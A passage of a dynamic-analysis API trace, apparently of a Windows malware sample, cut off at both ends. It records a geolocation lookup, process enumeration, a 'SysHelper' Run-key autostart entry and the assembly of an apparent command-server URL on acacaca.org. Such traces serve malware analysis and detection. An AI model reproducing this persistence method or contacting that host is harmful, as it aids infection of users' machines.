lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0173.209] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x2a) returned 0x63b798 [0173.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x63b798, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0173.209] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x7c [0173.210] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x80) returned 0x641300 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0173.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x29) returned 0x63b7d0 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x63b7d0, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0173.210] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x80 [0173.210] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x84) returned 0x641300 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0173.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x16) returned 0x641238 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=Q9IATRKPRH", cchWideChar=-1, lpMultiByteStr=0x641238, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=Q9IATRKPRH", lpUsedDefaultChar=0x0) returned 22 [0173.210] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x84 [0173.210] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x88) returned 0x641300 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0173.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x13) returned 0x641258 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x641258, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=kEecfMwgj", lpUsedDefaultChar=0x0) returned 19 [0173.210] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x88 [0173.210] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x8c) returned 0x641300 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0173.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x1f) returned 0x63eef0 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\kEecfMwgj", cchWideChar=-1, lpMultiByteStr=0x63eef0, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\kEecfMwgj", lpUsedDefaultChar=0x0) returned 31 [0173.210] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x8c [0173.210] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x90) returned 0x641300 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0173.210] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x12) returned 0x641398 [0173.210] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x641398, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0173.211] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x641300) returned 0x90 [0173.211] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x641300, Size=0x94) returned 0x6413b8 [0173.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0173.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x18) returned 0x641300 [0173.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x641300, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0173.211] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6413b8) returned 0x94 [0173.211] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6413b8, Size=0x98) returned 0x6413b8 [0173.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0173.211] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x8, Size=0x46) returned 0x637170 [0173.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x637170, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0173.211] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x6413b8) returned 0x98 [0173.211] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x6413b8, Size=0x9c) returned 0x6413b8 [0173.238] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640918) returned 0x80 [0173.238] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640918) returned 0x80 [0173.239] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640918) returned 0x80 [0173.251] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8ec) returned 0x641fd0 [0173.252] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640918) returned 0x80 [0173.252] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x6332d0 [0173.252] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640918) returned 0x80 [0173.253] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640918) returned 0x80 [0173.253] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640918) returned 0x80 [0173.269] RtlSizeHeap (HeapHandle=0x620000, Flags=0x0, MemoryPointer=0x640918) returned 0x80 [0173.353] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0175.717] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x632930 [0175.733] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0178.501] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18c1c8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18e9c8 | out: lpBuffer=0x18c1c8*, lpdwNumberOfBytesRead=0x18e9c8*=0x22a) returned 1 [0178.502] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0178.502] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0178.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x654b28 [0178.509] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x240) returned 0x2c7a5d0 [0178.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7a5d0 | out: hHeap=0x620000) returned 1 [0178.515] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x654b28 | out: hHeap=0x620000) returned 1 [0178.516] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x632930 | out: hHeap=0x620000) returned 1 [0178.523] GetCurrentProcess () returned 0xffffffff [0178.523] GetLastError () returned 0x0 [0178.523] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0178.529] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x65e138 [0178.542] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8ec) returned 0x2cfffe8 [0178.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x667490 [0178.570] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x667490, nSize=0x400 | out: lpFilename="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe")) returned 0x8a [0178.570] PathRemoveFileSpecW (in: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" | out: pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa") returned 1 [0178.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2d008e0 [0178.582] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart" [0178.584] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart", pNumArgs=0x18eaa8 | out: pNumArgs=0x18eaa8) returned 0x6662b8*="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0178.585] lstrcpyW (in: lpString1=0x18f738, lpString2="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" | out: lpString1="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0178.611] GetCommandLineW () returned="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart" [0178.611] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart", pNumArgs=0x18ea44 | out: pNumArgs=0x18ea44) returned 0x6662b8*="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0178.611] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe" [0178.611] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75cd0000 [0178.612] GetProcAddress (hModule=0x75cd0000, lpProcName="EnumProcesses") returned 0x0 [0178.612] GetProcAddress (hModule=0x75cd0000, lpProcName="EnumProcessModules") returned 0x0 [0178.612] GetProcAddress (hModule=0x75cd0000, lpProcName="GetModuleBaseNameW") returned 0x0 [0178.612] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x76710000 [0178.615] GetProcAddress (hModule=0x76710000, lpProcName="EnumProcesses") returned 0x76711544 [0178.615] GetProcAddress (hModule=0x76710000, lpProcName="EnumProcessModules") returned 0x76711408 [0178.616] GetProcAddress (hModule=0x76710000, lpProcName="GetModuleBaseNameW") returned 0x7671152c [0178.616] EnumProcesses (in: lpidProcess=0x184240, cb=0xa000, lpcbNeeded=0x18ea50 | out: lpidProcess=0x184240, lpcbNeeded=0x18ea50) returned 1 [0178.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0178.619] CloseHandle (hObject=0x0) returned 0 [0178.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0178.619] CloseHandle (hObject=0x0) returned 0 [0178.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfc) returned 0x0 [0178.619] CloseHandle (hObject=0x0) returned 0 [0178.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x140) returned 0x0 [0178.619] CloseHandle (hObject=0x0) returned 0 [0178.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x164) returned 0x0 [0178.619] CloseHandle (hObject=0x0) returned 0 [0178.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0178.619] CloseHandle (hObject=0x0) returned 0 [0178.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x18c) returned 0x0 [0178.619] CloseHandle (hObject=0x0) returned 0 [0178.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0178.619] CloseHandle (hObject=0x0) returned 0 [0178.619] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0178.619] CloseHandle (hObject=0x0) returned 0 [0178.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0178.620] CloseHandle (hObject=0x0) returned 0 [0178.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0178.620] CloseHandle (hObject=0x0) returned 0 [0178.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0178.620] CloseHandle (hObject=0x0) returned 0 [0178.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2c0) returned 0x0 [0178.620] CloseHandle (hObject=0x0) returned 0 [0178.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x318) returned 0x0 [0178.620] CloseHandle (hObject=0x0) returned 0 [0178.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0178.620] CloseHandle (hObject=0x0) returned 0 [0178.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x380) returned 0x0 [0178.620] CloseHandle (hObject=0x0) returned 0 [0178.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3d8) returned 0x0 [0178.620] CloseHandle (hObject=0x0) returned 0 [0178.620] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x29c) returned 0x0 [0178.620] CloseHandle (hObject=0x0) returned 0 [0178.621] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x45c) returned 0x0 [0178.621] CloseHandle (hObject=0x0) returned 0 [0178.621] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0178.621] CloseHandle (hObject=0x0) returned 0 [0178.621] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4cc) returned 0x4ec [0178.621] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0178.621] CloseHandle (hObject=0x4ec) returned 1 [0178.621] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x538) returned 0x0 [0178.621] CloseHandle (hObject=0x0) returned 0 [0178.621] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x568) returned 0x0 [0178.621] CloseHandle (hObject=0x0) returned 0 [0178.621] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5fc) returned 0x4ec [0178.621] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0178.622] CloseHandle (hObject=0x4ec) returned 1 [0178.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x618) returned 0x4ec [0178.622] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0178.622] CloseHandle (hObject=0x4ec) returned 1 [0178.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x644) returned 0x4ec [0178.622] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 0 [0178.622] CloseHandle (hObject=0x4ec) returned 1 [0178.622] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x7dc) returned 0x4ec [0178.622] EnumProcessModules (in: hProcess=0x4ec, lphModule=0x18ea5c, cb=0x4, lpcbNeeded=0x18ea40 | out: lphModule=0x18ea5c, lpcbNeeded=0x18ea40) returned 1 [0178.623] GetModuleBaseNameW (in: hProcess=0x4ec, hModule=0x400000, lpBaseName=0x18e240, nSize=0x400 | out: lpBaseName="1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned 0x44 [0178.624] CloseHandle (hObject=0x4ec) returned 1 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x64a210 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7a5d0 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d010f8 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d01360 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d015c8 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d01830 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d01a98 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d01d00 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d01f68 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d021d0 [0178.645] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d02438 [0178.669] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0xf003f, phkResult=0x18ea40 | out: phkResult=0x18ea40*=0x4ec) returned 0x0 [0178.670] RegQueryValueExW (in: hKey=0x4ec, lpValueName="SysHelper", lpReserved=0x0, lpType=0x18ea3c, lpData=0x18d168, lpcbData=0x18ea20*=0x400 | out: lpType=0x18ea3c*=0x2, lpData="\"C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe\" --AutoStart", lpcbData=0x18ea20*=0x132) returned 0x0 [0178.670] RegCloseKey (hKey=0x4ec) returned 0x0 [0178.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x140) returned 0x667160 [0178.670] lstrlenA (lpString="\" --AutoStart") returned 13 [0178.670] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x120) returned 0x655b18 [0178.670] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x667160 | out: hHeap=0x620000) returned 1 [0178.671] PathFileExistsW (pszPath="C:\\Users\\kEecfMwgj\\AppData\\Local\\4d45d74b-b67c-4b05-9c99-9061295dc2fa\\1918cc07f0b41a9e9dc18e715e5862a68ca49d61fdad7d76126953629c05be98.exe") returned 1 [0178.671] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x120) returned 0x667160 [0178.672] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x655b18 | out: hHeap=0x620000) returned 1 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x28) returned 0x64a4e0 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d026a0 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d02908 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d02b70 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2d02dd8 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7d030 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7d298 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7d500 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7d768 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7d9d0 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x25c) returned 0x2c7dc38 [0178.672] lstrlenA (lpString="http://acacaca.org/test2/get.php") returned 32 [0178.672] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x42) returned 0x2ccb918 [0178.672] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2d026a0, cbMultiByte=-1, lpWideCharStr=0x2ccb918, cchWideChar=33 | out: lpWideCharStr="http://acacaca.org/test2/get.php") returned 33 [0178.673] lstrcatW (in: lpString1="", lpString2="http://acacaca.org/test2/get.php" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.673] lstrlenA (lpString="") returned 0 [0178.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x2c78930 [0178.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2d02908, cbMultiByte=-1, lpWideCharStr=0x2c78930, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0178.673] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.673] lstrlenA (lpString="") returned 0 [0178.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x2c789e0 [0178.673] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2d02b70, cbMultiByte=-1, lpWideCharStr=0x2c789e0, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0178.673] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.673] lstrlenA (lpString="") returned 0 [0178.673] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x2c78910 [0178.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2d02dd8, cbMultiByte=-1, lpWideCharStr=0x2c78910, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0178.674] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.674] lstrlenA (lpString="") returned 0 [0178.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x2c78940 [0178.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c7d030, cbMultiByte=-1, lpWideCharStr=0x2c78940, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0178.674] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.674] lstrlenA (lpString="") returned 0 [0178.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x2c78960 [0178.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c7d298, cbMultiByte=-1, lpWideCharStr=0x2c78960, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0178.674] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.674] lstrlenA (lpString="") returned 0 [0178.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 0x2c78990 [0178.674] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2c7d500, cbMultiByte=-1, lpWideCharStr=0x2c78990, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0178.674] lstrcatW (in: lpString1="http://acacaca.org/test2/get.php", lpString2="" | out: lpString1="http://acacaca.org/test2/get.php") returned="http://acacaca.org/test2/get.php" [0178.674] lstrlenA (lpString="") returned 0 [0178.674] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2) returned 